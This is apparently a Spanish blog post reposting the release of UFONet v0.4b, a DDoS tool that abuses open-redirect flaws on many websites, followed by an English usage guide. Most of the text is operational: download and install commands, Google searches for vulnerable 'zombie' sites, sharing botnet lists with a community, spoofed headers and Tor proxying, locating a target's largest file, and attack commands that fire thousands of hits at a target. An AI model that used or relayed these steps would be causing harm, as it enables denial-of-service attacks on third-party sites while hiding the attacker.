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PostHeaderIcon UFONet - DDoS via WebAbuse - v0.4b "Infection"

Lord Epsylon (psy) publica una nueva versión de UFONet. UFONet es una herramienta para realizar ataques DDoS (Distributed Denial of Service) a través de vectores "Open Redirect". Es decir, se aprovecha de la mala configuración de miles y miles de sitios, para redireccionar las peticiones de éstos hacia un único punto.

¿Qué es UFONet?

+ Herramienta automática para lanzar ataques DDoS
+ Escrita en python / GPL v3.0
+ Primera versión:
- Nacida como modulo de XSSer (2009)
- Lanzada: v0.1b → 2013
+ Explota la Capa 7 (HTTP/Web Abuse)
- Vectores “Open Redirect”
OWASP: Top 10 2013-A10-Unvalidated Redirects and Forwards
+ Objetivo → Agotamiento de recursos (DoS)

¿Cómo funciona?

+ CWE-601: URL Redirection to Untrusted Site
Una aplicación web acepta una entrada controlada por el usuario, que especifica un enlace a
un sitio web externo y éste, utiliza ese enlace para una redirección.
+ OWASP: URL Redirector Abuse
Una aplicación acepta URLs arbitrarias definidas por el usuario, que luego se utilizan como objetivos para la redirección. Los usuarios pueden ser reconducidos, sin saberlo, a un sitio malicioso desde otro de confianza.
Ej: Ataques de Phishing
 - CWE-601:Open Redirect:

Web: http://ufonet.sf.net

Características principales:

 + Se actualiza de forma automática
 + Código bastante limpio (solo necesita python-pycurl)
 + Documentación con ejemplos
 + Tiene un interfaz Web/GUI
 + Permite usar un proxy para conectarte a los "zombies" (ej: tor)
 + Puedes cambiar las cabeceras HTTP (User-Agent, Referer, Host...)
 + Puedes configurar las peticiones (Timeout, Retries, Delay...)
 + Tiene una opción para buscar "zombies" en los resultados de google
(usando un patrón o a través de una lista de dorks)
 + Permite probar las vulnerabilidades 'Open Redirect' en los "zombies"
 + Permite subir/bajar "zombies" a un servidor de Comunidad
 + Inspecciona el objetivo para buscar los ficheros de mayor peso
 + Te permite elegir el punto en el que quieres que los "zombies"
recarguen (ej: una película, un fichero de peso, etc..)
 + Puedes controlar el número de rondas que quieres atacar
 + Aplica algunas técnicas para evadir la cache en el objetivo
 + [...]

 - http://ufonet.sf.net/ufonet/UFONet-v0.4b.webm

 $ git clone https://github.com/epsylon/ufonet

Paquete (.zip):
 - http://sf.net/projects/ufonet/files/ufonet-v0.4b.zip

 - https://twitter.com/psytzsche/status/544787094179414016

 - https://forum.unsystem.net/t/ufonet-v0-4b-infection-released/414

Opciones - Parámetros de UFOnet

 --version             show program's version number and exit
  -v, --verbose         active verbose on requests
  --check-tor           check to see if Tor is used properly
  --force-yes           Set 'YES' to all questions
  --update              check for latest stable version
  --gui                 launch GUI/Web Interface

  *Configure Request(s)*:
    --proxy=PROXY       Use proxy server (tor: http://localhost:8118)
    --user-agent=AGENT  Use another HTTP User-Agent header (default SPOOFED)
    --referer=REFERER   Use another HTTP Referer header (default SPOOFED)
    --host=HOST         Use another HTTP Host header (default NONE)
    --xforw             Set your HTTP X-Forwarded-For with random IP values
    --xclient           Set your HTTP X-Client-IP with random IP values
    --timeout=TIMEOUT   Select your timeout (default 30)
    --retries=RETRIES   Retries when the connection timeouts (default 1)
    --delay=DELAY       Delay in seconds between each HTTP request (default 0)

  *Manage Botnet*:
    -s SEARCH           Search 'zombies' on google (ex: -s 'proxy.php?url=')
    --sd=DORKS          Search from a list of 'dorks' (ex: --sd dorks.txt)
    --sn=NUM_RESULTS    Set max number of result to search (default 10)
    -t TEST             Test list of web 'zombie' servers (ex: -t zombies.txt)

  *Community Botnet*:
    --download-zombies  Download list of 'zombies' from Community
    --upload-zombies    Share your 'zombies' with Community

  *Research Target*:
    -i INSPECT          Inspect object's sizes (ex: -i http(s)://target.com)

  *Configure Attack(s)*:
    -r ROUNDS           Set number of 'rounds' for the attack (default: 1)
    -b PLACE            Set a place to 'bit' on target (ex: -b /path/big.jpg)
    -a TARGET           Start a Web DDoS attack (ex: -a http(s)://target.com)

UFONet funciona en diferentes plataformas.
- GNU/Linux / Win32 / OSX …
- Python (~2.7.x)
- python-pycurl - Python bindings to libcurl

En sistemas basados en Debian (ej: Ubuntu):

~$ sudo apt-get install python-pycurl

+ Modularidad:
- Código escrito desde 0 (Limpio)
+ Proxy: (ej: Tor)
- Maestro → Proxy → Proxy(Zombie) → Objetivo
+ Spoofing: (Cabeceras HTTP)
- User-Agent/Referer/Host/X-Forwarded-For/...
+ Controlador de la Botnet:
- Buscar 'zombies' en Internet
- Probar las vulnerabilidades (Open Redirect)
+ Impacto: Petición(es) / Evadir cache en objetivo/...

  •  Download:
  Current version: v0.4b - Infection!

git clone https://github.com/epsylon/ufonet

Package: UFOnet(.zip)

  • Installing:
  UFONet runs on many platforms.  It requires Python and the following library:

       python-pycurl - Python bindings to libcurl

  On Debian-based systems (ex: Ubuntu), run: 

       sudo apt-get install python-pycurl

  Source libs: Python | PyCurl

  • Searching for 'zombies':
  UFONet will search on google results for possible 'Open Redirect' vulnerable sites. 
  A common query string should be like this:


  So for example, you can begin a search with:

       ./ufonet -s 'proxy.php?url='

  At the end of the process, you will be asked if you want to check the list retrieved to see 
  if the urls are vulnerable.

       Wanna check if they are valid zombies? (Y/n)

  Also, you will be asked to update the list adding automatically only 'vulnerable' web apps.

       Wanna update your list (Y/n)

  If you reply 'Y', your new 'zombies' will be appended to the file named: zombies.txt


     + with verbose:       ./ufonet -s 'proxy.php?url=' -v
     + retrieve 15 urls:   ./ufonet -s 'proxy.php?url=' --sn 15

  • Testing botnet:
  Open 'zombies.txt' (or another file) and create a list of possible 'zombies'. 
  Urls of the 'zombies' should be like this:


  After that, launch it:

       ./ufonet -t zombies.txt

  At the end of the process, you will be asked if you want to update the list 
  adding automatically only 'vulnerable' web apps.

       Wanna update your list (Y/n)

  If you reply 'Y', your file: zombies.txt will be updated.


     + with verbose:     ./ufonet -t zombies.txt -v
     + with proxy TOR:   ./ufonet -t zombies.txt --proxy=""

  • Inspecting a target:
  This option is useful to know the best place to attack your target.

  It will crawl your objetive to provide you with a URL path to the largest object (size)
  found in the HTML code.

       ./ufonet -i http://target.com

  Then, you will can drive your 'zombies' to reload just there, doing your most effective attack.

       ./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"

  • Attacking a target:
  Enter a target to attack, with the number of rounds that will be attacked:

       ./ufonet -a http://target.com -r 10

  This will attack the target, with the list of 'zombies' that your provided on: "zombies.txt", 
  a number of 10 times for each 'zombie'. That means, that if you have a list of 1.000 'zombies', 
  the program will launch 1.000 'zombies' x 10 rounds = 10.000 'hits' to the target.

  By default, if you don't put any round, it will apply only 1.

  Additionally, you can choose a place to recharge on target's site. For example, a large image, 
  a big size file or a flash movie. In some scenarios where targets doesn't use cache systems, 
  this will do the attack more effective.

       ./ufonet -a http://target.com -b "/images/big_size_image.jpg"


     + with verbose:     ./ufonet -a http://target.com -r 10 -v
     + with proxy TOR:   ./ufonet -a http://target.com -r 10 --proxy=""
     + with a place:     ./ufonet -a http://target.com -r 10 -b "/images/big_size_image.jpg"

  • Updating:
  UFONet implements an option to update the tool to the latest stable version.
  This feature can be used only if you have cloned it from GitHub repository

  To check your version you should launch:

       ./ufonet --update

  This will update the tool automatically, removing all files from your old package.

  • GUI/Web Interface:
  You can manage UFONet using a Web interface. The tool has implemented a python web server
  connected to the core, to provides you a more user friendly experience.


  To launch it, use:

      ./ufonet --gui

  This will open a tab on your default browser with some options of the tool.

  • Schema:

  • Slides:
  - UFONet-v0.3.1b (English): Download! (.pdf)

  - UFONet-v0.3.1b (Spanish): Download! (.pdf)

  • Videos:
 - UFONet-v0.4b "Infection" (.webm)

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